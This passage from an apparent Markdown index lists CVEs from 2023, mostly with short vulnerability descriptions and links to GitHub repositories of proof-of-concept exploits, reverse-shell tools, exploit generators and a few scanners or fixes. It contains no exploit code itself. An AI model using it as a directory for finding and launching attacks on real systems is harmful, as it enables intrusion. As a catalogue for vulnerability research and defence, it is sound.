- [Any3ite/cve-2023-38646-metabase-ReverseShell](https://github.com/Any3ite/cve-2023-38646-metabase-ReverseShell)
- [robotmikhro/CVE-2023-38646](https://github.com/robotmikhro/CVE-2023-38646)
- [kh4sh3i/CVE-2023-38646](https://github.com/kh4sh3i/CVE-2023-38646)
- [yxl2001/CVE-2023-38646](https://github.com/yxl2001/CVE-2023-38646)
- [alexandre-pecorilla/CVE-2023-38646](https://github.com/alexandre-pecorilla/CVE-2023-38646)
- [m3m0o/metabase-pre-auth-rce-poc](https://github.com/m3m0o/metabase-pre-auth-rce-poc)
- [CN016/Metabase-H2-CVE-2023-38646-](https://github.com/CN016/Metabase-H2-CVE-2023-38646-)
- [Boogipop/MetabaseRceTools](https://github.com/Boogipop/MetabaseRceTools)
- [SUT0L/CVE-2023-38646](https://github.com/SUT0L/CVE-2023-38646)
- [nickswink/CVE-2023-38646](https://github.com/nickswink/CVE-2023-38646)
- [passwa11/CVE-2023-38646](https://github.com/passwa11/CVE-2023-38646)
- [threatHNTR/CVE-2023-38646](https://github.com/threatHNTR/CVE-2023-38646)
- [asepsaepdin/CVE-2023-38646](https://github.com/asepsaepdin/CVE-2023-38646)
- [Pyr0sec/CVE-2023-38646](https://github.com/Pyr0sec/CVE-2023-38646)
- [birdm4nw/CVE-2023-38646](https://github.com/birdm4nw/CVE-2023-38646)
- [AnvithLobo/CVE-2023-38646](https://github.com/AnvithLobo/CVE-2023-38646)
- [Red4mber/CVE-2023-38646](https://github.com/Red4mber/CVE-2023-38646)
- [junnythemarksman/CVE-2023-38646](https://github.com/junnythemarksman/CVE-2023-38646)
- [Mrunalkaran/CVE-2023-38646](https://github.com/Mrunalkaran/CVE-2023-38646)
- [j0yb0y0h/CVE-2023-38646](https://github.com/j0yb0y0h/CVE-2023-38646)
- [Ego1stoo/CVE-2023-38646](https://github.com/Ego1stoo/CVE-2023-38646)
- [0utl4nder/Another-Metabase-RCE-CVE-2023-38646](https://github.com/0utl4nder/Another-Metabase-RCE-CVE-2023-38646)
- [Shisones/MetabaseRCE_CVE-2023-38646](https://github.com/Shisones/MetabaseRCE_CVE-2023-38646)
- [acesoyeo/METABASE-RCE-CVE-2023-38646-](https://github.com/acesoyeo/METABASE-RCE-CVE-2023-38646-)
- [UserConnecting/Exploit-CVE-2023-38646-Metabase](https://github.com/UserConnecting/Exploit-CVE-2023-38646-Metabase)

### CVE-2023-38709 (2024-04-04)

Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses.

This issue affects Apache HTTP Server: through 2.4.58.

- [mrmtwoj/apache-vulnerability-testing](https://github.com/mrmtwoj/apache-vulnerability-testing)

### CVE-2023-38743 (2023-09-11)

Zoho ManageEngine ADManager Plus before Build 7200 allows admin users to execute commands on the host machine.

- [PetrusViet/CVE-2023-38743](https://github.com/PetrusViet/CVE-2023-38743)

### CVE-2023-38817 (2023-10-11)

An issue in Inspect Element Ltd Echo.ac v.5.2.1.0 allows a local attacker to gain privileges via a crafted command to the echo_driver.sys component. NOTE: the vendor's position is that the reported ability for user-mode applications to execute code as NT AUTHORITY\SYSTEM was "deactivated by Microsoft itself."

- [vxcall/kur](https://github.com/vxcall/kur)

### CVE-2023-38820
- [TraiLeR2/DLL-Planting-Slack-4.33.73-CVE-2023-38820](https://github.com/TraiLeR2/DLL-Planting-Slack-4.33.73-CVE-2023-38820)

### CVE-2023-38821
- [TraiLeR2/CoD-MW-Warzone-2---CVE-2023-38821](https://github.com/TraiLeR2/CoD-MW-Warzone-2---CVE-2023-38821)

### CVE-2023-38822
- [TraiLeR2/Corsair---DLL-Planting-CVE-2023-38822](https://github.com/TraiLeR2/Corsair---DLL-Planting-CVE-2023-38822)

### CVE-2023-38829 (2023-09-11)

An issue in NETIS SYSTEMS WF2409E v.3.6.42541 allows a remote attacker to execute arbitrary code via the ping and traceroute functions of the diagnostic tools component in the admin management interface.

- [adhikara13/CVE-2023-38829-NETIS-WF2409E](https://github.com/adhikara13/CVE-2023-38829-NETIS-WF2409E)

### CVE-2023-38831 (2023-08-23)

RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file. This was exploited in the wild in April through October 2023.

- [BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc](https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc)
- [b1tg/CVE-2023-38831-winrar-exploit](https://github.com/b1tg/CVE-2023-38831-winrar-exploit)
- [IR-HuntGuardians/CVE-2023-38831-HUNT](https://github.com/IR-HuntGuardians/CVE-2023-38831-HUNT)
- [Garck3h/cve-2023-38831](https://github.com/Garck3h/cve-2023-38831)
- [ignis-sec/CVE-2023-38831-RaRCE](https://github.com/ignis-sec/CVE-2023-38831-RaRCE)
- [HDCE-inc/CVE-2023-38831](https://github.com/HDCE-inc/CVE-2023-38831)
- [Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE](https://github.com/Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE)
- [knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831](https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831)
- [akhomlyuk/cve-2023-38831](https://github.com/akhomlyuk/cve-2023-38831)
- [PascalAsch/CVE-2023-38831-KQL](https://github.com/PascalAsch/CVE-2023-38831-KQL)
- [ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc](https://github.com/ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc)
- [thegr1ffyn/CVE-2023-38831](https://github.com/thegr1ffyn/CVE-2023-38831)
- [MortySecurity/CVE-2023-38831-Exploit-and-Detection](https://github.com/MortySecurity/CVE-2023-38831-Exploit-and-Detection)
- [z3r0sw0rd/CVE-2023-38831-PoC](https://github.com/z3r0sw0rd/CVE-2023-38831-PoC)
- [sh770/CVE-2023-38831](https://github.com/sh770/CVE-2023-38831)
- [BeniB3astt/CVE-2023-38831_ReverseShell_Winrar](https://github.com/BeniB3astt/CVE-2023-38831_ReverseShell_Winrar)
- [MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC](https://github.com/MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC)
- [Mich-ele/CVE-2023-38831-winrar](https://github.com/Mich-ele/CVE-2023-38831-winrar)
- [asepsaepdin/CVE-2023-38831](https://github.com/asepsaepdin/CVE-2023-38831)
- [Fa1c0n35/CVE-2023-38831-winrar-exploit](https://github.com/Fa1c0n35/CVE-2023-38831-winrar-exploit)
- [xaitax/WinRAR-CVE-2023-38831](https://github.com/xaitax/WinRAR-CVE-2023-38831)
- [GOTonyGO/CVE-2023-38831-winrar](https://github.com/GOTonyGO/CVE-2023-38831-winrar)
- [Malwareman007/CVE-2023-38831](https://github.com/Malwareman007/CVE-2023-38831)
- [ameerpornillos/CVE-2023-38831-WinRAR-Exploit](https://github.com/ameerpornillos/CVE-2023-38831-WinRAR-Exploit)
- [an040702/CVE-2023-38831](https://github.com/an040702/CVE-2023-38831)
- [elefantesagradodeluzinfinita/cve-2023-38831](https://github.com/elefantesagradodeluzinfinita/cve-2023-38831)
- [malvika-thakur/CVE-2023-38831](https://github.com/malvika-thakur/CVE-2023-38831)
- [ruycr4ft/CVE-2023-38831](https://github.com/ruycr4ft/CVE-2023-38831)
- [Nielk74/CVE-2023-38831](https://github.com/Nielk74/CVE-2023-38831)
- [kehrijksen/CVE-2023-38831](https://github.com/kehrijksen/CVE-2023-38831)
- [h3xecute/SideCopy-Exploits-CVE-2023-38831](https://github.com/h3xecute/SideCopy-Exploits-CVE-2023-38831)
- [s4m98/winrar-cve-2023-38831-poc-gen](https://github.com/s4m98/winrar-cve-2023-38831-poc-gen)
- [xk-mt/WinRAR-Vulnerability-recurrence-tutorial](https://github.com/xk-mt/WinRAR-Vulnerability-recurrence-tutorial)
- [MyStuffYT/CVE-2023-38831-POC](https://github.com/MyStuffYT/CVE-2023-38831-POC)
- [SpamixOfficial/CVE-2023-38831](https://github.com/SpamixOfficial/CVE-2023-38831)
- [r1yaz/winDED](https://github.com/r1yaz/winDED)
- [youmulijiang/evil-winrar](https://github.com/youmulijiang/evil-winrar)
- [solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC](https://github.com/solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC)
- [RomainBayle08/CVE-2023-38831](https://github.com/RomainBayle08/CVE-2023-38831)
- [imbyter/imbyter-WinRAR_CVE-2023-38831](https://github.com/imbyter/imbyter-WinRAR_CVE-2023-38831)
- [UnHackerEnCapital/PDFernetRemotelo](https://github.com/UnHackerEnCapital/PDFernetRemotelo)
- [Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784](https://github.com/Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784)
- [khanhtranngoccva/cve-2023-38831-poc](https://github.com/khanhtranngoccva/cve-2023-38831-poc)
- [MaorBuskila/Windows-X64-RAT](https://github.com/MaorBuskila/Windows-X64-RAT)
- [yezzfusl/cve_2023_38831_scanner](https://github.com/yezzfusl/cve_2023_38831_scanner)
- [FirFirdaus/CVE-2023-38831](https://github.com/FirFirdaus/CVE-2023-38831)
- [ra3edAJ/LAB-DFIR-cve-2023-38831](https://github.com/ra3edAJ/LAB-DFIR-cve-2023-38831)
- [technicalcorp0/CVE-2023-38831-Exploit](https://github.com/technicalcorp0/CVE-2023-38831-Exploit)
- [idkwastaken/CVE-2023-38831](https://github.com/idkwastaken/CVE-2023-38831)

### CVE-2023-38836 (2023-08-21)

File Upload vulnerability in BoidCMS v.2.0.0 allows a remote attacker to execute arbitrary code by adding a GIF header to bypass MIME type checks.

- [1337kid/CVE-2023-38836](https://github.com/1337kid/CVE-2023-38836)

### CVE-2023-38840 (2023-08-15)

Bitwarden Desktop 2023.7.0 and below allows an attacker with local access to obtain sensitive information via the Bitwarden.exe process.

- [markuta/bw-dump](https://github.com/markuta/bw-dump)

### CVE-2023-38890 (2023-08-18)

Online Shopping Portal Project 3.1 allows remote attackers to execute arbitrary SQL commands/queries via the login form, leading to unauthorized access and potential data manipulation. This vulnerability arises due to insufficient validation of user-supplied input in the username field, enabling SQL Injection attacks.

- [akshadjoshi/CVE-2023-38890](https://github.com/akshadjoshi/CVE-2023-38890)

### CVE-2023-38891 (2023-09-14)

SQL injection vulnerability in Vtiger CRM v.7.5.0 allows a remote authenticated attacker to escalate privileges via the getQueryColumnsList function in ReportRun.php.

- [jselliott/CVE-2023-38891](https://github.com/jselliott/CVE-2023-38891)

### CVE-2023-39024
- [BenTheCyberOne/CVE-2023-39024-5-POC](https://github.com/BenTheCyberOne/CVE-2023-39024-5-POC)

### CVE-2023-39062 (2023-08-28)

Cross Site Scripting vulnerability in Spipu HTML2PDF before v.5.2.8 allows a remote attacker to execute arbitrary code via a crafted script to the forms.php.

- [afine-com/CVE-2023-39062](https://github.com/afine-com/CVE-2023-39062)

### CVE-2023-39063 (2023-09-11)

Buffer Overflow vulnerability in RaidenFTPD 2.4.4005 allows a local attacker to execute arbitrary code via the Server name field of the Step by step setup wizard.

- [AndreGNogueira/CVE-2023-39063](https://github.com/AndreGNogueira/CVE-2023-39063)

### CVE-2023-39115 (2023-08-16)

install/aiz-uploader/upload in Campcodes Online Matrimonial Website System Script 3.3 allows XSS via a crafted SVG document.

- [Raj789-sec/CVE-2023-39115](https://github.com/Raj789-sec/CVE-2023-39115)

### CVE-2023-39144 (2023-08-03)

Element55 KnowMore appliances version 21 and older was discovered to store passwords in plaintext.

- [cduram/CVE-2023-39144](https://github.com/cduram/CVE-2023-39144)

### CVE-2023-39320 (2023-09-08)

The go.mod toolchain directive, introduced in Go 1.21, can be leveraged to execute scripts and binaries relative to the root of the module when the "go" command was executed within the module. This applies to modules downloaded using the "go" command from the module proxy, as well as modules downloaded directly using VCS software.

- [ayrustogaru/cve-2023-39320](https://github.com/ayrustogaru/cve-2023-39320)

### CVE-2023-39361 (2023-09-05)

Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.

- [HPT-Intern-Task-Submission/CVE-2023-39361](https://github.com/HPT-Intern-Task-Submission/CVE-2023-39361)

### CVE-2023-39362 (2023-09-05)

Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept in input some variables and place them into an `exec` call without a proper escape or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.

- [m3ssap0/cacti-rce-snmp-options-vulnerable-application](https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application)
- [jakabakos/CVE-2023-39362-cacti-snmp-command-injection-poc](https://github.com/jakabakos/CVE-2023-39362-cacti-snmp-command-injection-poc)

### CVE-2023-39526 (2023-08-07)

PrestaShop is an open source e-commerce web application. Versions prior to 1.7.8.10, 8.0.5, and 8.1.1 are vulnerable to remote code execution through SQL injection and arbitrary file write in the back office. Versions 1.7.8.10, 8.0.5, and 8.1.1 contain a patch. There are no known workarounds.

- [dnkhack/fixcve2023_39526_2023_39527](https://github.com/dnkhack/fixcve2023_39526_2023_39527)

### CVE-2023-39539 (2023-12-06)

AMI AptioV contains a vulnerability in BIOS where a User may cause an unrestricted upload of a PNG Logo file with dangerous type by Local access. A successful exploit of this vulnerability may lead to a loss of Confidentiality, Integrity, and/or Availability.

- [AdamWen230/CVE-2023-39539-PoC](https://github.com/AdamWen230/CVE-2023-39539-PoC)

### CVE-2023-39593
- [Ant1sec-ops/CVE-2023-39593](https://github.com/Ant1sec-ops/CVE-2023-39593)

### CVE-2023-39707 (2023-08-25)

A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add Expense parameter under the Expense section.

- [Arajawat007/CVE-2023-39707](https://github.com/Arajawat007/CVE-2023-39707)

### CVE-2023-39708 (2023-08-28)

A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add New parameter under the New Buy section.

- [Arajawat007/CVE-2023-39708](https://github.com/Arajawat007/CVE-2023-39708)

### CVE-2023-39709 (2023-08-28)

Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allow attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add Member section.

- [Arajawat007/CVE-2023-39709](https://github.com/Arajawat007/CVE-2023-39709)

### CVE-2023-39710 (2023-09-01)

Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allow attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add Customer section.

- [Arajawat007/CVE-2023-39710](https://github.com/Arajawat007/CVE-2023-39710)

### CVE-2023-39711 (2023-09-07)

Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allow attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Subtotal and Paidbill parameters under the Add New Put section.

- [Arajawat007/CVE-2023-39711](https://github.com/Arajawat007/CVE-2023-39711)

### CVE-2023-39712 (2023-09-08)

Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allow attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add New Put section.

- [Arajawat007/CVE-2023-39712](https://github.com/Arajawat007/CVE-2023-39712)

### CVE-2023-39714 (2023-09-01)

Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allow attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add New Member section.

- [Arajawat007/CVE-2023-39714](https://github.com/Arajawat007/CVE-2023-39714)

### CVE-2023-39725
- [anky-123/CVE-2023-39725](https://github.com/anky-123/CVE-2023-39725)

### CVE-2023-40000 (2024-04-16)

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache allows Stored XSS. This issue affects LiteSpeed Cache: from n/a through 5.7.

- [rxerium/CVE-2023-40000](https://github.com/rxerium/CVE-2023-40000)
- [quantiom/litespeed-cache-xss-poc](https://github.com/quantiom/litespeed-cache-xss-poc)
- [iveresk/cve-2023-40000](https://github.com/iveresk/cve-2023-40000)

### CVE-2023-40028 (2023-08-15)

Ghost is an open source content management system. Versions prior to 5.59.1 are subject to a vulnerability which allows authenticated users to upload files that are symlinks. This can be exploited to perform an arbitrary file read of any file on the host operating system. Site administrators can check for exploitation of this issue by looking for unknown symlinks within Ghost's `content/` folder. Version 5.59.1 contains a fix for this issue. All users are advised to upgrade. There are no known workarounds for this vulnerability.

- [0xyassine/CVE-2023-40028](https://github.com/0xyassine/CVE-2023-40028)

### CVE-2023-40031 (2023-08-25)

Notepad++ is a free and open-source source code editor. Versions 8.5.6 and prior are vulnerable to heap buffer write overflow in `Utf8_16_Read::convert`. This issue may lead to arbitrary code execution. As of time of publication, no known patches are available in existing versions of Notepad++.

- [webraybtl/CVE-2023-40031](https://github.com/webraybtl/CVE-2023-40031)

### CVE-2023-40037 (2023-08-18)

Apache NiFi 1.21.0 through 1.23.0 support JDBC and JNDI JMS access in several Processors and Controller Services with connection URL validation that does not provide sufficient protection against crafted inputs. An authenticated and authorized user can bypass connection URL validation using custom input formatting. The resolution enhances connection URL validation and introduces validation for additional related properties. Upgrading to Apache NiFi 1.23.1 is the recommended mitigation.

- [mbadanoiu/CVE-2023-40037](https://github.com/mbadanoiu/CVE-2023-40037)

### CVE-2023-40044 (2023-09-27)

In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.

- [kenbuckler/WS_FTP-CVE-2023-40044](https://github.com/kenbuckler/WS_FTP-CVE-2023-40044)

### CVE-2023-40084 (2023-12-04)

In run of MDnsSdListener.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [Trinadh465/platform_system_netd_AOSP10_r33_CVE-2023-40084](https://github.com/Trinadh465/platform_system_netd_AOSP10_r33_CVE-2023-40084)

### CVE-2023-40109 (2024-02-15)

In createFromParcel of UsbConfiguration.java, there is a possible background activity launch (BAL) due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.

- [uthrasri/CVE-2023-40109](https://github.com/uthrasri/CVE-2023-40109)

### CVE-2023-40121 (2023-10-27)

In appendEscapedSQLString of DatabaseUtils.java, there is a possible SQL injection due to unsafe deserialization. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.

- [hshivhare67/platform_framework_base_AOSP6_r22_CVE-2023-40121](https://github.com/hshivhare67/platform_framework_base_AOSP6_r22_CVE-2023-40121)
- [hshivhare67/platform_framework_base_android-4.2.2_r1_CVE-2023-40121](https://github.com/hshivhare67/platform_framework_base_android-4.2.2_r1_CVE-2023-40121)

### CVE-2023-40127 (2023-10-27)

In multiple locations, there is a possible way to access screenshots due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

- [Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127)
- [Trinadh465/CVE-2023-40127](https://github.com/Trinadh465/CVE-2023-40127)
- [saurabh2088/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/saurabh2088/platform_packages_providers_MediaProvider_CVE-2023-40127)
- [RenukaSelvar/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/RenukaSelvar/platform_packages_providers_MediaProvider_CVE-2023-40127)
- [RenukaSelvar/packages_providers_MediaProvider_CVE-2023-40127](https://github.com/RenukaSelvar/packages_providers_MediaProvider_CVE-2023-40127)

### CVE-2023-40133 (2023-10-27)

In multiple locations of DialogFillUi.java, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

- [uthrasri/frame_CVE-2023-40133_136_137](https://github.com/uthrasri/frame_CVE-2023-40133_136_137)

### CVE-2023-40140 (2023-10-27)

In android_view_InputDevice_create of android_view_InputDevice.cpp, there is a possible way to execute arbitrary code due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [hshivhare67/platform_frameworks_base_android-4.2.2_r1_CVE-2023-40140](https://github.com/hshivhare67/platform_frameworks_base_android-4.2.2_r1_CVE-2023-40140)
- [hshivhare67/platform_frameworks_base_AOSP6_r22_CVE-2023-40140](https://github.com/hshivhare67/platform_frameworks_base_AOSP6_r22_CVE-2023-40140)

### CVE-2023-40275 (2024-03-19)

An issue was discovered in OpenClinic GA 5.247.01. It allows retrieval of patient lists via queries such as findFirstname= to _common/search/searchByAjax/patientslistShow.jsp.

- [BugBountyHunterCVE/CVE-2023-40275](https://github.com/BugBountyHunterCVE/CVE-2023-40275)

### CVE-2023-40276 (2024-03-19)

An issue was discovered in OpenClinic GA 5.247.01. An Unauthenticated File Download vulnerability has been discovered in pharmacy/exportFile.jsp.

- [BugBountyHunterCVE/CVE-2023-40276](https://github.com/BugBountyHunterCVE/CVE-2023-40276)

### CVE-2023-40277 (2024-03-19)

An issue was discovered in OpenClinic GA 5.247.01. A Reflected Cross-Site Scripting (XSS) vulnerability has been discovered in the login.jsp message parameter.

- [BugBountyHunterCVE/CVE-2023-40277](https://github.com/BugBountyHunterCVE/CVE-2023-40277)

### CVE-2023-40278 (2024-03-19)

An issue was discovered in OpenClinic GA 5.247.01. An Information Disclosure vulnerability has been identified in the printAppointmentPdf.jsp component of OpenClinic GA. By changing the AppointmentUid parameter, an attacker can determine whether a specific appointment exists based on the error message.

- [BugBountyHunterCVE/CVE-2023-40278](https://github.com/BugBountyHunterCVE/CVE-2023-40278)

### CVE-2023-40279 (2024-03-19)

An issue was discovered in OpenClinic GA 5.247.01. An attacker can perform a directory path traversal via the Page parameter in a GET request to main.do.

- [BugBountyHunterCVE/CVE-2023-40279](https://github.com/BugBountyHunterCVE/CVE-2023-40279)

### CVE-2023-40280 (2024-03-19)

An issue was discovered in OpenClinic GA 5.247.01. An attacker can perform a directory path traversal via the Page parameter in a GET request to popup.jsp.

- [BugBountyHunterCVE/CVE-2023-40280](https://github.com/BugBountyHunterCVE/CVE-2023-40280)

### CVE-2023-40294 (2023-08-14)

libboron in Boron 2.0.8 has a heap-based buffer overflow in ur_parseBlockI at i_parse_blk.c.

- [Halcy0nic/CVE-2023-40294-and-CVE-2023-40295](https://github.com/Halcy0nic/CVE-2023-40294-and-CVE-2023-40295)

### CVE-2023-40296 (2023-08-14)

async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in ReceiveFrom and Receive in udpsocket.hpp when processing malformed UDP packets.

- [Halcy0nic/CVE-2023-40296](https://github.com/Halcy0nic/CVE-2023-40296)

### CVE-2023-40297 (-)

Stakater Forecastle 1.0.139 and before allows %5C../ directory traversal in the website component.

- [sahar042/CVE-2023-40297](https://github.com/sahar042/CVE-2023-40297)

### CVE-2023-40361 (2023-10-20)

SECUDOS Qiata (DOMOS OS) 4.13 has Insecure Permissions for the previewRm.sh daily cronjob. To exploit this, an attacker needs access as a low-privileged user to the underlying DOMOS system. Every user on the system has write permission for previewRm.sh, which is executed by the root user.

- [vianic/CVE-2023-40361](https://github.com/vianic/CVE-2023-40361)

### CVE-2023-40362 (2024-01-12)

An issue was discovered in CentralSquare Click2Gov Building Permit before October 2023. Lack of access control protections allows remote attackers to arbitrarily delete the contractors from any user's account when the user ID and contractor information is known.

- [ally-petitt/CVE-2023-40362](https://github.com/ally-petitt/CVE-2023-40362)

### CVE-2023-40404 (2023-10-25)

A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Sonoma 14.1. An app may be able to execute arbitrary code with kernel privileges.

- [geniuszlyy/GenEtherExploit](https://github.com/geniuszlyy/GenEtherExploit)

### CVE-2023-40429 (2023-09-26)

A permissions issue was addressed with improved validation. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10, macOS Sonoma 14. An app may be able to access sensitive user data.

- [biscuitehh/cve-2023-40429-ez-device-name](https://github.com/biscuitehh/cve-2023-40429-ez-device-name)

### CVE-2023-40459 (2023-12-04)

The ACEManager component of ALEOS 4.16 and earlier does not adequately perform input sanitization during authentication, which could potentially result in a Denial of Service (DoS) condition for ACEManager without impairing other router functions. ACEManager recovers from the DoS condition by restarting within ten seconds of becoming unavailable.

- [majidmc2/CVE-2023-40459](https://github.com/majidmc2/CVE-2023-40459)
- [7h3w4lk3r/CVE-2023-40459](https://github.com/7h3w4lk3r/CVE-2023-40459)

### CVE-2023-40477 (2024-05-03)

RARLAB WinRAR Recovery Volume Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the processing of recovery volumes. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21233.

- [winkler-winsen/Scan_WinRAR](https://github.com/winkler-winsen/Scan_WinRAR)
- [wildptr-io/Winrar-CVE-2023-40477-POC](https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC)

### CVE-2023-40600 (2023-11-30)

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Exactly WWW EWWW Image Optimizer. It works only when debug.log is turned on. This issue affects EWWW Image Optimizer: from n/a through 7.2.0.

- [RandomRobbieBF/CVE-2023-40600](https://github.com/RandomRobbieBF/CVE-2023-40600)

### CVE-2023-40626 (2023-11-29)

The language file parsing process could be manipulated to expose environment variables. Environment variables might contain sensitive information.

- [TLWebdesign/Joomla-3.10.12-languagehelper-hotfix](https://github.com/TLWebdesign/Joomla-3.10.12-languagehelper-hotfix)

### CVE-2023-40868 (2023-09-14)

Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.

- [MinoTauro2020/CVE-2023-40868](https://github.com/MinoTauro2020/CVE-2023-40868)

### CVE-2023-40869 (2023-09-14)

Cross Site Scripting vulnerability in mooSocial mooSocial Software 3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions.

- [MinoTauro2020/CVE-2023-40869](https://github.com/MinoTauro2020/CVE-2023-40869)

### CVE-2023-40924 (2023-09-08)

SolarView Compact < 6.00 is vulnerable to Directory Traversal.

- [Yobing1/CVE-2023-40924](https://github.com/Yobing1/CVE-2023-40924)

### CVE-2023-40930 (2023-09-20)

An issue in the directory /system/bin/blkid of Skyworth v3.0 allows attackers to perform a directory traversal via mounting the Udisk to /mnt/.

- [NSnidie/CVE-2023-40930](https://github.com/NSnidie/CVE-2023-40930)

### CVE-2023-40931 (2023-09-19)

A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php.

- [sealldeveloper/CVE-2023-40931-PoC](https://github.com/sealldeveloper/CVE-2023-40931-PoC)

### CVE-2023-40933 (2023-09-19)

A SQL injection vulnerability in Nagios XI v5.11.1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function.

- [sealldeveloper/CVE-2023-40933-PoC](https://github.com/sealldeveloper/CVE-2023-40933-PoC)

### CVE-2023-40989 (2023-09-22)

SQL injection vulnerability in jeecgboot jeecg-boot v3.0 and 3.5.3 allows a remote attacker to execute arbitrary code via a crafted request to the report/jeecgboot/jmreport/queryFieldBySql component.

- [Zone1-Z/CVE-2023-40989](https://github.com/Zone1-Z/CVE-2023-40989)

### CVE-2023-41064 (2023-09-07)

A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 16.6.1 and iPadOS 16.6.1, macOS Monterey 12.6.9, macOS Ventura 13.5.2, iOS 15.7.9 and iPadOS 15.7.9, macOS Big Sur 11.7.10. Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

- [MrR0b0t19/vulnerabilidad-LibWebP-CVE-2023-41064](https://github.com/MrR0b0t19/vulnerabilidad-LibWebP-CVE-2023-41064)
- [MrR0b0t19/CVE-2023-41064](https://github.com/MrR0b0t19/CVE-2023-41064)
- [sarsaeroth/CVE-2023-41064-POC](https://github.com/sarsaeroth/CVE-2023-41064-POC)

### CVE-2023-41080 (2023-08-25)

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in the FORM authentication feature of Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.

The vulnerability is limited to the ROOT (default) web application.

- [shiomiyan/CVE-2023-41080](https://github.com/shiomiyan/CVE-2023-41080)

### CVE-2023-41265 (2023-08-29)

